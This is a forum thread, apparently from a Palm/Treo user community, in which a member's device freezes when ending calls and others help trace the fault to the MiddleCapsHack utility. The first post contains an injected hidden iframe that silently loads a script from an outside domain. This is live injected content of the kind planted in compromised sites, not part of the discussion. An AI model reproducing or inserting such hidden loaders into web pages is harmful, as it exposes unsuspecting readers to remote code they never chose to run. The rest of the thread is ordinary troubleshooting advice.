+ Reply to Thread
Results 1 to 9 of 9
  1. #1
    Registered User
    Join Date
    12-24-2001
    Posts
    179

    Help me find this bug!!!

    Launcher III
    DateBook 5
    1-Button+
    FlashPro
    Several business apps
    Fingerdial
    *********************************
    Everything works perfectly - by far the best productivity tool I've ever had, and the most reliable until this morning. Nothing sync'd today, nothing new, didn't drop it, but:

    About 50% of the time, when terminating a call by touching the END button, the unit freezes - nothing works until I do a soft reset.

    ??<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The older I get, the better I was...

  2. #2
    Registered User
    Join Date
    03-15-2002
    Location
    Maryland
    Posts
    279
    just a quick guess off the top of my head: have you designated the End button to something else in 1 Button? (can't remember if it allows designating soft buttons but if it's doin 'double duty' it could be a problem)
    .....beam me up Scotty...

  3. #3
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    tuff call.. any one of the bizz apps could be at fault or a combination of apps..

    my tip is to cold boot and install a couple ata time. its time consuming, but it will tell the tale of which app is a fault.

  4. #4
    Fully Converged
    Join Date
    02-27-2002
    Posts
    1,013
    Hi,

    Can you find a rule for this 50% - How do you originate the
    calls that cause the crush? :

    - Are those incoming calls only ?
    - Are those calls started from the built-in PhoneApp, or another app. ?
    - Are those calls dialed manually on the keypad, or to contacts from your address-book ?
    - Are those lengthy calls ?
    - Anything you do during the call ?
    Shimon Shnitzer
    Maker of TAKEphONE for PalmOS
    www.shsh.com

  5. #5
    PalmVenue Guy
    Join Date
    11-05-2001
    Location
    USA
    Posts
    110
    I bet it's 1-button--I had the same problem when I assigned the power button to an additional function when using SlowLaunch. Disable that and see if it is corrected.

  6. #6
    Registered User
    Join Date
    12-24-2001
    Posts
    179
    This is very odd!!

    The fault occurs *only* when MiddleCapsHack is working!!! How can any palm work without that terrific little hack?!?!?

    It must a combination of that hack with something new...
    The older I get, the better I was...

  7. #7
    Registered User
    Join Date
    12-24-2001
    Posts
    179
    After some experimenting, it is *definitely* middlecaps doing it. Anyone else have this problem??

    And I sent a bug report to the author.
    The older I get, the better I was...

  8. #8
    Registered User bxjmpr's Avatar
    Join Date
    09-02-2002
    Location
    NY
    Posts
    87
    I have been having the same problem. I counld't figure out what could be causing it. I thought it was the speakerphone hack. Thanks I will disable middle caps and see if that helps!!

  9. #9
    Registered User
    Join Date
    04-08-2002
    Location
    Orange, CA
    Posts
    10

    Unhappy

    Had the same problem with middleCaps.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts